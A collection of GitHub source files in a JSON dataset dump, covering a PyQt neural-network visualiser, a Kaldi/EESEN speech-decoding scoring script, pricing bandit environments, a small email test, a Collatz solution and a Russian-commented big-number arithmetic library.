QMainWindow, QApplication, QDockWidget, 
QWidget, QGridLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_qt4agg\n\nclass MainWindow(QMainWindow):\n x = np.arange(1, 100, 0.001)\n delta = 1\n lim = 13\n A1 = np.random.rand(2,2)\n A2 = np.random.rand(2,2)\n b1 = np.array([0, 0])\n b2 = np.array([0, 0])\n\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.figure = plt.figure()\n self.drawing = self.figure.add_subplot(122)\n self.another = self.figure.add_subplot(121)\n self.canvas = matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg(self.figure)\n\n self.setCentralWidget(self.canvas)\n\n dock = QDockWidget(\"Values\")\n self.addDockWidget(Qt.RightDockWidgetArea, dock)\n\n sliders = QWidget()\n sliders_grid = QGridLayout(sliders)\n\n def add_slider(foo, col, row):\n sld = QSlider(Qt.Horizontal, sliders)\n sld.setMinimum(-10)\n sld.setMaximum(10)\n sld.setFocusPolicy(Qt.NoFocus)\n sld.valueChanged[int].connect(foo)\n sld.valueChanged.connect(self.plot)\n sliders_grid.addWidget(sld, row, col)\n\n add_slider(foo=self.a00, col=0, row=0)\n add_slider(foo=self.a01, col=0, row=1)\n add_slider(foo=self.a10, col=0, row=2)\n add_slider(foo=self.a11, col=0, row=3)\n add_slider(foo=self.c00, col=1, row=0)\n add_slider(foo=self.c01, col=1, row=1)\n add_slider(foo=self.c10, col=1, row=2)\n add_slider(foo=self.c11, col=1, row=3)\n add_slider(foo=self.b10, col=2, row=0)\n add_slider(foo=self.b11, col=2, row=1)\n add_slider(foo=self.b20, col=3, row=0)\n add_slider(foo=self.b21, col=3, row=1)\n \n\n dock.setWidget(sliders)\n\n self.plot()\n \n def a00(self, val):\n self.A1[0][0] = val\n\n def a01(self, val):\n self.A1[0][1] = val\n\n def a10(self, val):\n self.A1[1][0] = val\n\n def a11(self, val):\n self.A1[1][1] = val\n\n def c00(self, val):\n self.A2[0][0] = val\n\n def c01(self, val):\n self.A2[0][1] = val\n\n def c10(self, val):\n self.A2[1][0] = val\n\n def c11(self, val):\n self.A2[1][1] = val\n\n def b10(self, val):\n self.b1[0] = val \n\n def b11(self, val):\n self.b1[1] = val\n\n def b20(self, val):\n self.b2[0] = val\n\n def b21(self, val):\n self.b2[1] = val\n\n def sigm(self, x):\n return 1/(1+np.exp(-x))\n\n\n def neural_net(self, x, A1, A2, b1, b2, ind):\n def layer(x, A, b):\n return self.sigm(A.dot(x) + b)\n y1 = layer(x, A1, b1)\n y2 = layer(y1, A2, b2)\n return y2[ind]\n\n datx = np.arange(-13, 13, 1)\n daty = np.arange(-13, 13, 1)\n\n X, Y = np.meshgrid(np.arange(-13, 13, 1), np.arange(-13, 13, 1))\n\n #Z = X + Y\n def make_z(self, ind):\n Z = []\n for i in self.daty:\n ls = []\n for j in self.datx:\n ls.append(self.neural_net(np.array([j, i]), self.A1, self.A2, self.b1, self.b2, ind))\n Z.append(ls)\n return Z\n\n def plot(self):\n self.drawing.hold(False)\n self.another.contourf(self.X, self.Y, self.make_z(1))\n self.drawing.contourf(self.X, self.Y, self.make_z(0))\n self.drawing.set_ylim(-10, 10)\n self.canvas.draw()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"nzinci/Neural-networks-graphical-explaining","sub_path":"nnw.py","file_name":"nnw.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41705359292","text":"import os\n\nfrom utils.utils import run_shell\n\n\ndef score(data, words_path, dir,\n word_ins_penalty=None,\n min_acwt=1,\n max_acwt=20,\n acwt_factor=0.05 # the scaling factor for the acoustic scale. 
The scaling factor for acoustic likelihoods\n # needs to be 0.5 ~1.0. However, the job submission script can only take integers as the\n # job marker. That's why we set the acwt to be integers (5 ~ 10), but scale them with 0.1\n # when they are actually used.\n ):\n if word_ins_penalty is None:\n word_ins_penalty = [0.0, 0.5, 1.0, 1.5, 2.0]\n # decoing_scripts_folder = os.path.join(os.getcwd(), __name__.split(\".\")[0]) # 'kaldi_decoding_scripts'\n # pl_cmd_script = os.path.join(decoing_scripts_folder, \"utils/run.pl\")\n # assert os.path.exists(pl_cmd_script)\n # assert os.access(pl_cmd_script, os.X_OK)\n # symtab = os.path.join(lang_or_graph, \"words.txt\")\n # assert os.path.exists(symtab)\n # assert os.path.exists(os.path.join(dir, \"lat.1.gz\"))\n # assert os.path.exists(os.path.join(data, \"text\"))\n # int2sym_script = os.path.join(decoing_scripts_folder, \"utils/int2sym.pl\")\n # assert os.path.exists(int2sym_script)\n # assert os.access(int2sym_script, os.X_OK)\n # if not os.path.isdir(os.path.join(dir, \"scoring\", \"log\")):\n # os.makedirs(os.path.join(dir, \"scoring\", \"log\"))\n\n # --cmd \"$decode_cmd\" --nj 10 --beam 17.0 --lattice_beam 8.0 --max-active 5000 --acwt 0.9 \\\n # --skip true --splice true --splice-opts \"--left-context=1 --right-context=1\" --skip-frames 3 --skip-offset 1 \\\n # ${lang_dir}_test_${lm_suffix} $exp_base/$test $train_dir/decode_${test}_${lm_suffix} || exit 1;\n\n # words_path = \"wrds.txt\"\n\n if not os.path.exists(f\"{dir}/scoring\"):\n os.makedirs(f\"{dir}/scoring\")\n\n assert os.environ['EESEN_ROOT']\n lattice_scale_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-scale\"\n lattice_add_penalty_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-add-penalty\"\n lattice_best_path_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-best-path\"\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(\n # f\"{lattice_scale_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n # + f\"{lattice_add_penalty_bin} --word-ins-penalty={wip} ark:- ark:- |\"\n # + f\"{lattice_best_path_bin} --word-symbol-table={words_path} ark:- ark,t:{dir}/scoring/{ACWT}_{wip}_tra\")\n\n # run_shell(f\"cat {data}/text | sed 's:::g' | sed 's:::g' > {dir}/scoring/test_filt.txt\")\n run_shell(\n f\"cat {data}/text | sed 's:::g' | sed 's:::g' | sed 's:::g' > {dir}/scoring/text_filt\")\n\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n lattice_1best_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-1best\"\n nbest_to_ctm_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/nbest-to-ctm\"\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n\n int2sym_script = os.path.join(os.getcwd(), \"kaldi_decoding_scripts/utils/int2sym.pl\")\n assert os.path.exists(int2sym_script)\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(f\"cat {dir}/scoring/{ACWT}_{wip}_tra | {int2sym_script} -f 2- {words_path} | \"\n # + f\" sed 's:::g' | sed 's:::g' | sed 's:::g' |\"\n # + f\"{compute_wer_bin} --text --mode=present ark:{dir}/scoring/text_filt ark,p:- {dir}/details_{ACWT}_{wip} >& {dir}/wer_{ACWT}_{wip}\")\n\n convert_ctm_script = os.path.join(os.getcwd(), \"kws_decoder/eesen_utils/convert_ctm.pl\")\n assert os.path.exists(convert_ctm_script)\n name = \"test_name_\"\n # for wip in word_ins_penalty:\n for ACWT in range(min_acwt, max_acwt):\n if not 
os.path.exists(f\"{dir}/score_{ACWT}/\"):\n os.makedirs(f\"{dir}/score_{ACWT}/\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel \"\n + f\"> {dir}/score_{ACWT}/{name}.ctm\")\n","repo_name":"pfriesch/PhnKWS","sub_path":"kaldi_decoding_scripts/ctc_decoding/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18397523414","text":"import itertools\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom gym import Env, spaces\n\nfrom bandits.bandits import BinomialBanditEnv\n\n\nclass PricingBernoulliBanditEnv(Env):\n def __init__(self, num_arms, dist, p_min=1, p_max=17, n_customers=100):\n super(PricingBernoulliBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.dist = dist # scipy dist\n self.p_min = p_min\n self.p_max = p_max\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n # normalize the prices to [0, 1]\n self.action_to_price = np.linspace(p_min, p_max, num_arms)\n self.mus = 1 - dist.cdf(self.action_to_price)\n self.b_bandit = BinomialBanditEnv(n=n_customers, probs=self.mus)\n\n self.max_reward = np.max(self.mus * self.action_to_price)\n\n def step(self, action):\n assert self.b_bandit.action_space.contains(action)\n\n observation, conversion_reward, done, info = self.b_bandit.step(action)\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n\ndef get_avocado_df(avocado_path):\n df = pd.read_csv(avocado_path)\n df = df.drop(columns=[\"Unnamed: 0\"])\n df[\"date\"] = df[\"Date\"].astype(\"datetime64[ns]\")\n df = df.sort_values(\"Date\")\n df = df[df[\"date\"] < \"2018-01-01\"]\n df = df[df[\"type\"] == \"conventional\"].reset_index(drop=True)\n\n df[\"price\"] = df[\"AveragePrice\"]\n df[\"quantity\"] = df[\"Total Volume\"]\n\n cols = [\"date\", \"price\", \"quantity\", \"region\"]\n df = df[cols].copy()\n\n aggregated_regions = [\n \"TotalUS\",\n \"West\",\n \"SouthCentral\",\n \"Northeast\",\n \"Southeast\",\n \"Midsouth\",\n \"Plains\",\n \"GreatLakes\",\n \"California\",\n ]\n df = df[~df.region.isin(aggregated_regions)]\n region_to_volume = df.groupby([\"region\"]).quantity.sum().sort_values(ascending=False).reset_index()\n good_regions = set(region_to_volume[:20].region) - set([\"LosAngeles\", \"NewYork\"])\n df = df[df.region.isin(good_regions)]\n return df\n\n\nclass PricingAvocadoBanditEnv(Env):\n def __init__(\n self,\n num_arms,\n avocado_df,\n region,\n start_date,\n model_path=\"../data/avocado_lgbm_model.txt\",\n T=10000,\n p_min=0.1,\n p_max=1,\n ):\n super(PricingAvocadoBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.start_date = start_date\n self.current_idx = 0\n self.region = region\n mm_prices = avocado_df[avocado_df.region == region].price.apply([\"min\", 
\"max\"])\n self.p_min_dataset = mm_prices[\"min\"]\n self.p_max_dataset = mm_prices[\"max\"]\n self.p_min_scale = p_min\n self.p_max_scale = p_max\n\n self.model = lgb.Booster(model_file=model_path)\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n self.action_to_price = np.linspace(self.p_min_scale, self.p_max_scale, num_arms)\n self.action_to_price_dataset = np.linspace(self.p_min_dataset, self.p_max_dataset, num_arms)\n\n self._prepare_predict_df(avocado_df, T)\n\n def step(self, action):\n assert self.action_space.contains(action)\n\n price = self.action_to_price_dataset[action]\n predict_df = self.price_to_predict_df[price]\n observation = 0\n conversion_reward = predict_df.iloc[self.current_idx, :][\"quantity_norm\"]\n # print(predict_df.iloc[self.current_idx, :])\n self.current_idx += 1\n done = False\n info = None\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n def _prepare_predict_df(self, avocado_df, T):\n # Preparing the prediction dataframe from which the rewards will be drawn\n # basically, just predicting the grid of [prices, dates]\n\n def cols_to_categorical(df, categorical_columns):\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n def featurize(df):\n df[\"year-month\"] = df[\"date\"].dt.year * 100 + df[\"date\"].dt.month\n df[\"year\"] = df[\"date\"].dt.year\n df[\"month\"] = df[\"date\"].dt.month\n\n end_date = self.start_date + pd.Timedelta(T - 1, unit=\"D\")\n dates = pd.date_range(start=self.start_date, end=end_date)\n predict_df = pd.DataFrame(\n list(itertools.product(self.action_to_price_dataset, dates)),\n columns=[\"price\", \"date\"],\n )\n predict_df[\"region\"] = self.region\n featurize(predict_df)\n categorical_columns = [\"region\"]\n cols_to_categorical(predict_df, categorical_columns)\n model_cols = [\"price\", \"region\"]\n predict_df[\"quantity_without_noise\"] = self.model.predict(predict_df[model_cols])\n self.q_std = avocado_df[avocado_df.region == self.region].quantity.std()\n self.quantity_norm = avocado_df[avocado_df.region == self.region].quantity.max()\n e = np.random.normal(loc=0, scale=self.q_std, size=predict_df.shape[0]) / 5\n predict_df[\"quantity\"] = predict_df[\"quantity_without_noise\"] + e\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n predict_df[\"quantity_norm\"] = predict_df[\"quantity\"] / self.quantity_norm\n means = predict_df.groupby(\"price\")[\"quantity_norm\"].mean().reset_index()\n means[\"mean_reward\"] = means[\"quantity_norm\"] * self.action_to_price\n self.max_reward = np.max(means[\"mean_reward\"])\n self.predict_df = predict_df\n\n # splitting the dataframe into slices based on prices\n # would speed up the self.step() significantly\n self.price_to_predict_df = {}\n for p in self.action_to_price_dataset:\n mask = np.isclose(self.predict_df[\"price\"], p)\n self.price_to_predict_df[p] = self.predict_df[mask]\n","repo_name":"thxi/hse_thesis","sub_path":"bandits/pricing/bandits.py","file_name":"bandits.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15623501358","text":"# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\n# Open a plain text file for reading. 
For this example, assume that\n# the text file contains only ASCII characters.\nmsg = MIMEText(\"This is an example email.\\nIt contains text.\")\n\n# me == the sender's email address\n# you == the recipient's email address\nmsg['Subject'] = 'Dart Battle Beta Test Signup Request'\nmsg['From'] = \"beta.test@dartbattle.fun\"\nmsg['To'] = \"beta.test@dartbattle.fun\"\n\n# Send the message via our own SMTP server, but don't include the\n# envelope header.\ns = smtplib.SMTP('localhost')\ns.sendmail(me, [you], msg.as_string())\ns.quit()\nprint(\"Success.\")","repo_name":"allenstetson/dartBattle","sub_path":"lambda/us-east-1_dartBattle/emailTest.py","file_name":"emailTest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21848989793","text":"def collatz(n) :\n if n % 2 : \n return 3 * n + 1\n return n // 2 \n\ndic = {}\n\nfor i in range(2 , 1000001) : \n count = 1 ; num = i \n while num != 1 :\n count += 1 \n num = collatz(num)\n if num in dic : \n count += dic[num] - 1 \n num = 1 \n dic[i] = count \n\na = max(dic.values())\n\nfor k , v in dic.items() : \n if v == a :\n print(k)\n break ","repo_name":"PHNPR/Project-Euler-Problem-Solutions-in-Python","sub_path":"014.py","file_name":"014.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13178772875","text":"# Задача N-1(COM_NN_D): \"Сравнение натуральных чисел\"\r\n# Выполнил Кашуба Д.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n\r\n# Алгоритм:\r\n# 1)Если длина первого больше длины второго, значит первое больше второго.\r\n# 2)Если длина второго больше длины первого, значит второе больше первого.\r\n# 3)Если длины одинаковы, проверяем каждый разряд числа пока не встретим различие: если цифра в рязряде первого числа больше цифры того же разряда второго числа,\r\n# то первое больше второго и наоборот.\r\n# 4)Если длины одинаковы и различий в разрядах нет, то числа равны.\r\n\r\n# Выходные данные:\r\n# 2 - если первое больше второго.\r\n# 1 - если второе больше первого.\r\n# 0 - если числа равны.\r\n\r\ndef COM_NN_D(n1, arr1, n2, arr2):\r\n if (n1 > n2):\r\n return 2\r\n elif (n1 < n2):\r\n return 1\r\n else:\r\n for i in range(0, n1):\r\n if (arr1[i] > arr2[i]):\r\n return 2\r\n elif (arr1[i] < arr2[i]):\r\n return 1\r\n return 0\r\n\r\n\r\n# Задача N-2(NZER_N_B): \"Проверка на ноль\"\r\n# Выполнил Волосевич А.Н. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число, представленных следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр A[..]\r\n\r\n# Алгоритм:\r\n# 1)Проверяем все цифры числа.\r\n# 2)Если хотя бы одна цифра не ноль, число не равно нулю.\r\n# 3)Иначе число равно нулю.\r\n\r\n# Выходные данные:\r\n# True - если число не 0\r\n# False - если число 0\r\n\r\ndef NZER_N_B(n: int, A: list) -> bool:\r\n for num in A:\r\n if num != 0:\r\n return True\r\n return False\r\n\r\n\r\n# Задача N-3(ADD_1N_N): \"Добавление 1 к натуральному числу\"\r\n# Выполнил Поллуксов А.В. 
1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход натуральное число, представленное следующим образом:\r\n# Целое число n - номер старшей позиции, и массив цифр arr[..]\r\n\r\n# Алгоритм:\r\n# 1)Добавляем 1 к цифре младшего разряда. Если она равна 9, заменяем её на 0 и добавляем 1 к следующему разряду.\r\n# 2)Если программа таким образом дошла до старшего разряда, который равен 9, значит, у числа появится новый разряд.\r\n\r\n# Выходные данные:\r\n# Целое число n, массив arr[..]\r\n\r\ndef ADD_1N_N(n, arr):\r\n i = n - 1\r\n while i != -1:\r\n arr[i] += 1\r\n if arr[i] == 10:\r\n arr[i] = 0\r\n if i == 0:\r\n arr.insert(0, 1)\r\n n += 1\r\n i -= 1\r\n else:\r\n i = -1\r\n return [n, arr]\r\n\r\n\r\n# Задача N-4(ADD_NN_N): \"Сложение натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход A - массив чисел(натуральное число), n_a - количество цифр числа A, то же самое с B.\r\n\r\n# Алгоритм:\r\n# Получаем на вход массив чисел. Присваиваем переменным i и j индексы последнего элемента массива.\r\n# С помощью функции COM_NN_D сравниваем два числа. Если В больше А, только меняем их местами.(Для удобства работы)\r\n# Далее, начиная с последнего элемента начинаем прибавлять к элементу А элемент В.\r\n# Если число получается больше 10, то прибавляем к следующему элементу единицу, а само число A[i] делаем остатком.\r\n# (A[i] % 10). Если достигаем старшей цифры числа, а эта цифра оказывается больше или равна 10:\r\n# То с помощью insert добавляем в массив единицу\r\n\r\n# Выходные данные:\r\n# Возвращаем массив чисел A (получившаяся сумма) и количество цифр в массиве n_a.\r\n\r\ndef ADD_NN_N(n_a, A, n_b, B):\r\n if COM_NN_D(n_a, A, n_b, B) == 1:\r\n tmp = A\r\n A = B\r\n B = tmp\r\n tmp = n_a\r\n n_a = n_b\r\n n_b = tmp\r\n i = n_a - 1\r\n j = n_b - 1\r\n while (i >= 0):\r\n if j >= 0:\r\n A[i] += B[j]\r\n if A[i] >= 10:\r\n A[i] = A[i] % 10\r\n if i > 0:\r\n A[i - 1] += 1\r\n else:\r\n A.insert(0, 1)\r\n n_a += 1\r\n i -= 1\r\n j -= 1\r\n\r\n return [n_a, A]\r\n\r\n\r\n# Задача N-5(SUB_NN_N): \"Вычитание натуральных чисел\"\r\n# Выполнил Шаров А.К. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр a1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр a2[..]\r\n\r\n# Алгоритм:\r\n# Если числа равны, результат - 0.\r\n# Иначе, проверяем, что первое дейтвительно больше второго.\r\n# Далее, алгоритм вычитания в столбик:\r\n# - начиная с младшего разряда, вычитаем из первой цифры вторую\r\n# - если вторая цифра больше первой, занимаем 1 из следующего разряда\r\n# Результат вычитания записывается в отдельный массив res[..]\r\n\r\n# Выходные данные:\r\n# Длина массива res (номер старшей позиции), и сам массив res[..]\r\n\r\ndef SUB_NN_N(n1: int, a1: list, n2: int, a2: list) -> tuple:\r\n res = []\r\n eq = COM_NN_D(n1, a1, n2, a2)\r\n if eq == 0:\r\n res.append(0)\r\n elif eq == 2:\r\n for i in range(1, n1 + 1):\r\n while n1 > n2:\r\n a2 = [0] + a2\r\n n2 += 1\r\n if a1[-i] >= a2[-i]:\r\n res.append(a1[-i] - a2[-i])\r\n if res[-1] < 0: a1[-i + 1] += 1\r\n else:\r\n a1[-i - 1] -= 1\r\n res.append(a1[-i] - a2[-i] + 10)\r\n res.reverse()\r\n while res[0] == 0: res.pop(0)\r\n return len(res), res\r\n\r\n\r\n# Задача N-6(MUL_ND_N): \"Умножение натурального числа на цифру\"\r\n# Выполнил Катрущенко О.Д. 
1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и цифру\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и цифра D\r\n\r\n# Алгоритм:\r\n# Начиная с младшего разряда, перемножаем разряд на цифру\r\n# - если в результате число из одного разряда, записываем его в массив для ответа\r\n# - если в результате ��исло из двух разядов, то записываем его младший разряд в массив для ответа,\r\n# а старший разряд записываем в вспомогательную переменную, чтобы добавить к результату следующего умножения\r\n\r\n# Выходные данные:\r\n# Целое число n, массив B[..]\r\n\r\ndef MUL_ND_N(n, A, D):\r\n ans = [0 for i in range(n)]\r\n r = 0\r\n for i in range(n - 1, -1, -1):\r\n ans[i] = A[i] * D + r\r\n if ans[i] >= 10:\r\n r = ans[i] // 10\r\n ans[i] = ans[i] % 10\r\n if r != 0:\r\n ans.insert(0, r)\r\n n += 1\r\n return [n, ans]\r\n\r\n\r\n# Задача N-7(MUL_Nk_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход одно натуральное число и коэффициент\r\n# Целое число n - номер старшей позиции, массив цифр A[..], и коэффициент k\r\n\r\n# Алгоритм:\r\n# заполняем элементы списка нулями, начиная с n-ного элемента и заканчивая n+k\r\n# т.к. итоговое число будет содержать в себе n+k элементов\r\n# увеличиваем счётчик кол-ва цифр\r\n# имеем число n и список a_t, содержащий в себе число, умноженное на 10^k и разбитое на цифры\r\n\r\n# Выходные данные:\r\n# Целое число n, массив a_t[..]\r\n\r\ndef MUL_Nk_N(n, A, k):\r\n a_t = A.copy()\r\n for i in range(n, n + k):\r\n a_t.insert(i, 0)\r\n n += k\r\n return n, a_t\r\n\r\n\r\n# Задача N-8(MUL_NN_N): \"Умножение натурального числа на 10^k\"\r\n# Выполнил Пелагейко А.А. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр B[..]\r\n\r\n# Алгоритм:\r\n# если первое число меньше второго - меняем их местами (для удобства работы)\r\n# перемножаем первое число поочерёдно с каждой цифрой из второго числа, начиная с младших разрядов\r\n# сдвигаем разряд произведения, умножив полученное слагаемое на 10^k\r\n# складываем полученные результаты произведений (сумма накапливается в массиве mul0)\r\n# увеличиваем сдвиг (переменная k) на 1\r\n\r\n# Выходные данные:\r\n# Целое число c2, массив mul0[..]\r\n\r\ndef MUL_NN_N(n1, A, n2, B):\r\n mul0 = []\r\n k = 0\r\n\r\n if A == [0] or B == [0]:\r\n c2 = 1\r\n mul0.insert(0, 0)\r\n else:\r\n\r\n if COM_NN_D(n1, A, n2, B) == 1:\r\n A, B = B, A\r\n temp = n1\r\n n1 = n2\r\n n2 = temp\r\n\r\n for i in range(len(B) - 1, -1, -1):\r\n c, L = MUL_ND_N(len(A), A, B[i])\r\n A.reverse()\r\n\r\n c1, L = MUL_Nk_N(c, L, k)\r\n\r\n c2, mul0 = ADD_NN_N(len(mul0), mul0, c1, L)\r\n\r\n k = k + 1\r\n return [c2, mul0]\r\n\r\n\r\n# Задача N-9(SUB_NDN_N): \"Вычитание из натурального другого натурального, умноженного на цифру для случая с неотрицательным результатом\"\r\n# Выполнил Кашуба Д.А. 
1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр arr1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр arr2[..]\r\n# и цифра D, на которую необходимо умножить\r\n\r\n# Алгоритм:\r\n# Умножаем на число, с помощью функции MUL_ND_N, вычитаем, с помощью функции SUB_NN_N, в которой уже есть проверка на то, равны ли числа\r\n\r\n# Выходные данные:\r\n# n_res - длина числа\r\n# A_res - результат вычитания\r\n\r\ndef SUB_NDN_N(n1, A1, n2, A2, D):\r\n A_res = []\r\n n2, A2 = MUL_ND_N(n2, A2, D)\r\n n_res, A_res = SUB_NN_N(n1, A1, n2, A2)\r\n return n_res, A_res\r\n\r\n\r\n# Задача N-10(DIV_NN_Dk): \"Вычисление первой цифры деления большего натурального на меньшее,\r\n# домноженное на 10^k,где k - номер позиции этой цифры (номер считается с нуля)\"\r\n# Выполнил Поллуксов А.В. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход 2 натуральных числа, представленных следующим образом:\r\n# Целое число (n; arr[..]) - номер старшей позиции и массив цифр\r\n\r\n# Алгоритм:\r\n# 1)Циклично умножаем меньшее число на 10, если в результате оно не будет больше бо́льшего числа\r\n# 2)Параллельно с шагом (1) считаем отступ k\r\n# 3)Пока первое число больше второго, отнимаем из бо́льшего меньшее\r\n# 4)Параллельно с шагом (3) считаем цифру d\r\n\r\n# Выходные данные:\r\n# Первая цифра деления d и его позиция k\r\n\r\ndef DIV_NN_Dk(n_1, arr1, n_2, arr2):\r\n arr_1 = arr1.copy()\r\n arr_2 = arr2.copy()\r\n k = 0\r\n while COM_NN_D(n_1, arr_1, n_2 + 1, arr_2 + [0]) != 1:\r\n n_2, arr_2 = MUL_Nk_N(n_2, arr_2, 1)\r\n k += 1\r\n d = 0\r\n while COM_NN_D(n_1, arr_1, n_2, arr_2) != 1:\r\n n_1, arr_1 = SUB_NN_N(n_1, arr_1, n_2, arr_2)\r\n d += 1\r\n return [d, k]\r\n\r\n\r\n# Задача N-11(DIV_NN_N): \"Частное от деления натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# n_1 - длина первого числа, arr_1 - массив цифр первого числа,\r\n# n_2 - длина второго числа, arr_2 - массив цифр второго числа.\r\n\r\n# Алгоритм:\r\n# Создаем результирующий массив k. s - длина массива k. С помощью функции DIV_NN_Dk вычисляем первую цифру частного (arr1 / arr2)\r\n# Прибавляем ее в результирующий массив k. С помощью функции MUL_Nk_N умножаем делитель (arr2) на 10 в степени k_t.\r\n# Вычитаем с помощью функции SUB_NDN_N из arr1 число полученное число t_2 длины t_1 (это arr2 умноженное на 10^k_t)\r\n# Прибавляем 1 к длине результата.\r\n\r\n# Выходные данные:\r\n# Возвращаем результирующий массив k (частное от деления arr1 на arr2 без остатка) и длину этого массива s.\r\n\r\ndef DIV_NN_N(n_1, arr_1, n_2, arr_2):\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n s = k_t + 1\r\n k = [0 for i in range(s)]\r\n while (k_t != 0):\r\n k[s - k_t - 1] = d_t\r\n t_1, t_2 = MUL_Nk_N(n_2, arr_2, k_t)\r\n n_1, arr_1 = SUB_NDN_N(n_1, arr_1, t_1, t_2, d_t)\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n k[s - k_t - 1] = d_t\r\n return [s, k]\r\n\r\n\r\n# Задача N-12(MOD_NN_N): \"Остаток от деления большего натурального числа на меньшее или равное натуральное с остатком(делитель отличен от нуля)\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] 
